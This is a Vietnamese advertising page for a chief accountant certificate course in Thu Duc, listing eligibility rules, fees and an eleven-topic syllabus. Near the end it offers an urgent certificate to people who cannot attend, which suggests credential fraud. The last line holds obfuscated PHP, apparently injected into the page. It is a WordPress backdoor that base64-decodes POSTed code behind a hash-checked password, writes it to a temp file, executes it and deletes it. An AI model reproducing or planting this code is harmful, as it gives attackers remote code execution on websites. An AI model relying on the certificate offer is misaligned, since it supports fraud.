1

Khóa học chứng chỉ kế toán trưởng tại Thủ Đức

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Khai giảng lớp bồi dưỡng chứng chỉ kế toán trưởng ở thành phố Thủ Đức

Theo quy định của pháp luật, mỗi doanh nghiệp hoặc đơn vị hành chính sự nghiệp phải có kế toán trưởng. Người được bổ nhiệm kế toán trưởng phải có chứng chỉ Bồi dưỡng kế toán trưởng theo quy định của Bộ Tài chính. Chứng chỉ Bổi dưỡng kế toán trưởng có 2 loại: Bồi dưỡng kế toán trưởng doanh nghiệp và Bồi dưỡng kế toán trưởng hành chính sự nghiệp.

Khóa học theo đúng quy định của Bộ Tài Chính, Uy Tín – Nhanh Chóng – Chất Lượng

Thành phố Thủ Đức là nơi tập trung của các trường đại học, có số lượng sinh viên tập trung đông đảo, nhộn nhịp. Môi trường học tập, làm việc và sinh sống tại Thành phố Thủ Đức là mối quan tâm của nhiều người. Với vai trò và vị trí như vậy nên Thủ Đức tập trung không nhỏ các doanh nghiệp. Trong đó nhu cầu về học và lấy chứng chỉ Bồi dưỡng Kế toán trưởng rất lớn.

 Những người nào đủ điều kiện để tham gia khóa học chứng chỉ kế toán trưởng ở Thủ Đức theo quy định của Bộ Tài chính:

Những người có nhu cầu học khóa Bồi dưỡng Kế toán trưởng theo quy định của Bộ Tài chính phải thỏa mãn 2 điều kiện:

Một là, tốt nghiệp từ trung cấp trở lên ngành kế toán, tài chính ngân hàng.
Hai là, có tối thiểu 2 năm kinh nghiệm với người tốt nghiệp đại học, tối thiểu 3 năm kinh nghiệm với người tốt nghiệp cao đẳng hoặc trung cấp tính từ ngày cấp bằng và phải có giấy xác nhận của cơ quan làm việc.
Như vậy, khi đăng ký học khóa Bồi dưỡng Kế toán trưởng, người tham gia khóa học phải nộp hồ sở gồm: (1) Bản sao công chứng bằng tốt nghiệp. (2) 3 ảnh 3×4 và (3) Giấy xác nhận của cơ quan đang làm việc. Giấy xác nhận của cơ quan làm việc với nội dung là xác nhận cho người tham gia học đang làm công việc kế toán với thời hạn tối thiểu như đã đề cập phía trên tùy theo bạn tốt nghiệp đại học hay cao đẳng, trung cấp.

– Về thời hạn chứng chỉ khóa Bồi dưỡng kế toán trưởng theo quy định của Bộ Tài chính.

Chứng chỉ Bồi dưỡng kế toán trưởng theo quy định của Bộ Tài chính có giá trị 5 năm tính từ ngày được cấp.

– Về đơn vị được cấp chứng chỉ Bồi dưỡng Kế toán trưởng theo quy định của Bộ tài chính.

Bộ Tài chính không trực tiếp cấp chứng chỉ mà cấp phép cho các đơn vị đào tạo thường là các trưởng đại học khối ngành kinh tế đào tạo và cấp. Theo đó,

Bộ Tài chính sẽ quản lý phôi và các đơn vị đào tạo sẽ ký và đóng dấu trên chứng chỉ.

Ở phía Nam có nhiều đơn vị được Bộ Tài chính cho phép được đào tạo và cấp chứng chỉ Bồi dưỡng Kế toán trưởng, trong đó có nhiều đơn vị được nhiều người tín nhiệm như: Trường Đại học Kinh tế TPHCM, Trường Đại học Kinh tế – Luật, Trường Đại học Tài Chính – Marketing, Trường Đại học Mở TPHCM…

Học viên sẽ nhận được nhiều lợi ích sau khóa học kế toán trưởng tại Thủ Đức?

Đến với trung tâm đào tạo kế toán trưởng tại Thủ Đức; mỗi học viên sẽ được nâng cao trình độ làm việc; được trang bị một hệ thống kiến thức rộng lớn. Để từ đó nắm bắt chính xác kỹ năng quản lý bộ máy kế toán; tổ chức bộ máy kế toán và chỉ đạo các công việc của bộ phận kế toán.

 Bằng phương pháp giảng dạy khóa học của trung tâm; học viên sẽ biết cách cập nhật những thông tư mới ban hành về luật; biết cách lập kế hoạch kinh doanh; kế hoạch vốn lưu động cho doanh nghiệp.

Trung tâm đào tạo kế toán trưởng tại Hà Nội  Học viên hiểu rõ được những thay đổi trong luật kế toán và nghề kế toán; hiểu rõ được vai trò của một kế toán trưởng trong doanh nghiệp. Nắm bắt tính chất, nội dung, mục đích hoạt động của các loại kiểm toán hiện nay.

Trung tâm đào tạo kế toán trưởng tại Hà Nội  Trung tâm đào tạo kế toán trưởng sẽ hỗ trợ học viên nắm vững phương pháp phân tích cơ cấu tài chính; rủi ro tài chính; rủi ro kinh doanh và đưa ra được các dự báo cho doanh nghiệp một cách chính xác và đúng luật.

Lớp bồi dưỡng kế toán trưởng tại Thủ Đức – Kế Toán Hà Nội thông báo mức học phí đang có chương trình ưu đãi. Giảm giá 530.000VNĐ/học viên nay giá khóa học chỉ còn 2.970.000/khóa/học viên. Ngoài ra học viên sẽ được cấp tài liệu ôn tập miễn phí; được hỗ trợ giải đáp thắc mắc lâu dài.

NỘI DUNG KHÓA HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG Ở THỦ ĐỨC NHƯ SAU

Chuyên đề 1: Pháp luật liên quan đến doanh nghiệp

 • Phần 1: Pháp luật về doanh nghiệp
 • Phần 2: Pháp luật về Hợp đồng kinh doanh
 • Phần 3: Pháp luật về Lao động

Chuyên đề 2: Quản lý tài chính doanh nghiệp

 • Phần 1: Giới thiệu về QTTC
 • Phần 2: Phân tích tài chính doanh nghiệp
 • Phần 3: Quản trị vốn lưu động
 • Phần 4: Giá trị của tiền tệ theo thời gian
 • Phần 5: Định giá chứng khoán
 • Phần 6: Lợi nhuận và rủi ro
 • Phần 7: Chi phí vốn doanh nghiệp
 • Phần 8: Đánh giá hiệu quả dự án trong đầu tư dài hạn
 • Phần 9: Kế hoạch ngân lưu và phân tích rủi ro DADT
 • Phần 10: Cơ cấu vốn doanh nghiệp

Chuyên đề 3: Pháp luật về thuế

 • Phần 1: Những vấn đề chung về thuế
 • Phần 2: Thuế Xuất – Nhập khẩu
 • Phần 3: Thuế Tiêu thụ đặc biệt
 • Phần 4: Thuế Giá trị gia tăng
 • Phần 5: Thuế Thu nhập cá nhân
 • Phần 6: Thuế Thu nhập doanh nghiệp

Chuyên đề 4: Thẩm định dự án đầu tư

 • Phần 1: Tổng quan về Quản trị dự án
 • Phần 2: Thiết lập và thẩm định dự án
 • Phần 3: Quản trị tiến độ dự án
 • Phần 4: Phân bổ nguồn lực cho dự án
 • Phần 5: Dự toán ngân sách &quản lý chi phí DA
 • Phần 6: Quản trị chất lượng dự án
 • Phần 7: Giám sát và đánh giá dự án
 • Phần 8: Quản trị rủi ro dự án

Chuyên đề 5: Quan hệ tín dụng, thanh toán và bảo lãnh giữa doanh nghiệp với Ngân hàng và tổ chức tài chính

 • Phần 1: Đánh giá chung khách hàng
 • Phần 2: Đánh giá tình hình tài chính khách hàng
 • Phần 3: Thẩm tra báo cáo tài chính khách hàng

Chuyên đề 6: Pháp luật về kế toán

 • Phần 1: Khái quát chung về pháp luật kế toán: Bản chất, vai trò của kế toán; Nhiệm vụ, yêu cầu của kế toán; Hệ thống pháp luật về kế toán
 • Phần 2: Nội dung cơ bản: Luật kế toán; Hệ thống chuẩn mực kế toán Việt Nam; Các chế độ và văn bản hướng dẫn về kế toán

Chuyên đề 7: Tổ chức công tác kế toán và vai trò, nhiệm vụ kế toán trưởng Doanh nghiệp

 • Vai trò, nhiệm vụ của kế toán trưởng doanh nghiệp
 • Tổ chức công tác kế toán
 • Tổ chức quy trình kế toán

Chuyên đề 8: Kế toán tài chính doanh nghiệp (kể cả kế toán đặc thù)

 • Phần 1: Khái quát chung kế toán tài chính; Bản chất, vai trò của kế toán tài chính; Đối tượng, nhiệm vụ của kế toán tài chính
 • Phần 2: Nội dung cơ bản KTTC: Kế toán tài sản ngắn hạn; Kế toán tài sản dài hạn; Kế toán nợ phải trả; Kế toán vốn chủ sở hữu; Kế toán tập hợp chi phí sản xuất và tính giá thành trong KTTC; Kế toán doanh thu, chi phí, xác định kết quả kinh doanh

Chuyên đề 9: Tổ chức kế toán quản trị doanh nghiệp

 • Quản trị khoản phải thu
 • Lá chắn thuế là gì? Tác động thế nào trong hoạt động của doanh nghiệp

Chuyên đề 10: Báo cáo tài chính và phân tích tài chính doanh nghiệp

 • Phần 1: Báo cáo tài chính: Những vấn đề chung về BCTC; Nội dung, cơ sở, phương pháp lập BCTC
 • Phần 2: Phân tích Báo cáo tài chính: Phân tích khái quát tình hình tài chính DN; Phân tích tình hình tài chính thông qua các tỷ số TC

Chuyên đề 11: Kiểm toán và kiểm toán báo cáo tài chính doanh nghiệp

 • Phần 1: Giới thiệu chung về kiểm toán
 • Phần 2: Kiểm soát nội bộ, Rủi ro và gian lận
 • Phần 3: Kiểm toán báo cáo tài chính

Ôn tập và thi

 • Ôn tập kiến thức nghiệp vụ
 • Thi chứng chỉ kế toán trưởng

CAM KẾT VÀ BAO ĐỖ KHÓA HỌC

 • Bạn nào không có thời gian theo học và cần chứng chỉ gấp mình hỗ trợ được.
 • Liên hệ ngay hoặc Inbox Zalo 0973.761.751 để được tư vấn, gửi chi tiết nội dung, hồ sơ, thủ tục phiếu đăng ký học cũng như gửi lịch học mới nhất luôn nhé!

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}